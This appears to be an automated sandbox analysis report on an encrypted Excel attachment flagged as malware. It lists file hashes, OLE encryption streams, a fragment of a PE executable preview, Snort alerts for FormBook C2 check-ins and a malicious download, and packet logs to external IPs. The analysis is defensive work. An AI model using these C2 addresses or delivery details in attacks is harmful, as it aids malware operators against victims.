Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.._..............P.................. ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........>..........C...h6...............................................+.&..(....6+.&...(........0...................... +.. ..A.X .%.Y ....a ....c;h....... .h.. .h..aYE...._..........R....... .s.&e f.7.Y ....cfYE....d...L...8w... Dx..e #...a ].!.X ....c* +.T.efe ...Y* ....f ....c* .... ..N.Y ..b.X* .I~. h..a .M..X .<)a .uR. e...Y >9..a .L..Y* ..f. ..o.Y ....a /...X ....Y*...0..........+.&..s.........+F..!a.+...&a8......&X+@..(=....+....YE....8...J...\...n.........

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.9958224135019424
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	NEW 01 13 2021.xlsx
File size:	1511936
MD5:	9aa0898ded04a2ee18d7b0074413ac94
SHA1:	59c525a0dd116c9f7ec4b5773a7131ef49a29ad9
SHA256:	d6823f8eaf8a072000df7cc5811f35e58f63182657c67f7d99874d7f534851e8
SHA512:	25707274e903241497c05f830c84ec20f67c73cbceebfedcacc1ae4bce8e1e21c7529ad7747a7d04a1bae33710ceacae9c68e1e8fe8663d90a7117ca6cf2d343
SSDEEP:	24576:E+t5yGH1B4ZAoV8c7Wpcma3kMjj3mlc5sghWJ/ZxjNWsaSe4Pno:Ek5yGHcP8Q8cFjUcmQWlwx8Po
File Content Preview:	........................>...............................................................................................z.......\|.......~...............z.......\|.......~......................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "NEW 01 13 2021.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1495896

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1495896
Entropy:	7.99984749113
Base64 Encoded:	True
Data ASCII:	C . . . . . . . q . m B . r . ' p q . . . . . . . . . . ] . . . . . . + . l . . . . . . r m A . . . . . . . . > + . . . ; * . . h . . L . 8 [ : b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . . ( . . v h . . U b . . 3 = . . .
Data Raw:	43 d3 16 00 00 00 00 00 71 a8 6d 42 fd 72 10 27 70 71 8e fe b9 ef ff 06 f4 8a 8f 18 5d ab ff ea 09 df a0 2b e6 6c fe cd 11 e1 d2 87 72 6d 41 93 a9 a5 ed df e2 f4 9e 3e 2b b4 9e 86 3b 2a c0 9b 68 fa ec 4c e1 38 5b 3a 62 c0 ab 33 3d e4 14 b5 28 ba 83 76 68 04 f4 55 62 c0 ab 33 3d e4 14 b5 28 ba 83 76 68 04 f4 55 62 c0 ab 33 3d e4 14 b5 28 ba 83 76 68 04 f4 55 62 c0 ab 33 3d e4 14 b5

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.54485651778
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . r N w . . ~ . ( . 1 . . . . K . 8 . ? z . . s l . E y . . . . . . . i i s Q . [ . l + . . . t . H . . ` . - + . . . . . . 4 . . .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/13/21-17:17:31.650222	TCP	2022550	ET TROJAN Possible Malicious Macro DL EXE Feb 2016	49165	80	192.168.2.22	18.195.87.136
01/13/21-17:18:46.505368	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49166	34.102.136.180	192.168.2.22
01/13/21-17:18:57.357280	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49168	80	192.168.2.22	54.254.26.94
01/13/21-17:18:57.357280	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49168	80	192.168.2.22	54.254.26.94
01/13/21-17:18:57.357280	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49168	80	192.168.2.22	54.254.26.94

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 17:17:31.609026909 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.649702072 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.649808884 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.650222063 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.691555023 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.691584110 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.691596031 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.691620111 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.691659927 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.691692114 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.732214928 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.732251883 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.732274055 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.732285023 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.732295990 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.732307911 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.732316971 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.732320070 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.732327938 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.732345104 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.732361078 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.732368946 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.732381105 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.732394934 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.732419014 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.732430935 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775386095 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775412083 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775429010 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775444984 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775454044 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775461912 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775479078 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775482893 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775487900 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775496006 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775516987 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775521994 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775537968 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775542021 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775547981 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775557995 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775569916 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775573969 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775587082 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775592089 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775604963 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775609016 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775621891 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775626898 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775644064 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775649071 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775655031 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775661945 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.775680065 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.775693893 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.778337002 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816703081 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816739082 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816762924 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816771984 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816787958 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816804886 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816808939 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816812038 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816833019 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816833019 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816839933 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816854000 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816869020 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816874027 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816879988 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816895008 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816910028 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816916943 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816931009 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816940069 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816951036 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816968918 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.816975117 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.816991091 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817004919 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817011118 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817019939 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817033052 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817045927 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817053080 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817065001 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817074060 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817084074 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817095995 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817109108 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817118883 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817122936 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817142010 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817154884 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817162037 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817171097 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817183018 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817194939 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817205906 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817210913 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817228079 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817240000 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817246914 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817255020 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817267895 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817281961 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817292929 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817296028 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817316055 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817326069 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817336082 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817343950 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817358017 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817369938 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817379951 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817416906 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817419052 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.817426920 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.817455053 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.819421053 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.857933044 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.857971907 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.857999086 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.858036041 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.858761072 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.858793020 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.858809948 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.858819008 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.858824968 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.858844995 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.858856916 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.858870983 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.858885050 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.858895063 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.858906031 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.858915091 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.858932972 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.858938932 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.858949900 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.858957052 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.858966112 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.858982086 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.858989000 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859002113 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859011889 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859023094 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859036922 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859040022 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859062910 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859074116 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859080076 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859091043 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859097004 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859107971 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859113932 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859122992 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859132051 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859148026 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859150887 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859164000 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859173059 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859178066 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859179020 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859189987 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.859275103 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.859303951 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860033035 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860057116 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860078096 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860086918 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860100031 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860100031 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860119104 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860121965 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860130072 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860136032 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860146999 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860156059 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860172033 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860176086 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860191107 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860193968 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860198975 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860210896 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860229969 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860240936 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860245943 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860248089 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860266924 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860266924 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860284090 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860289097 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860296011 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860305071 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860326052 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860332966 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860337973 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860337973 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860352993 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860373020 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860374928 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860389948 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860395908 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860405922 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860419035 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860429049 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860440969 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860454082 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860461950 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860470057 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860483885 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.860497952 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860513926 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.860879898 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.898709059 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.898798943 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.899352074 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.899410009 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900229931 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900258064 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900274992 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900284052 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900291920 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900296926 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900310993 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900312901 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900330067 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900331974 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900346994 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900351048 CET	80	49165	18.195.87.136	192.168.2.22
Jan 13, 2021 17:17:31.900362968 CET	49165	80	192.168.2.22	18.195.87.136
Jan 13, 2021 17:17:31.900369883 CET	80	49165	18.195.87.136	192.168.2.22
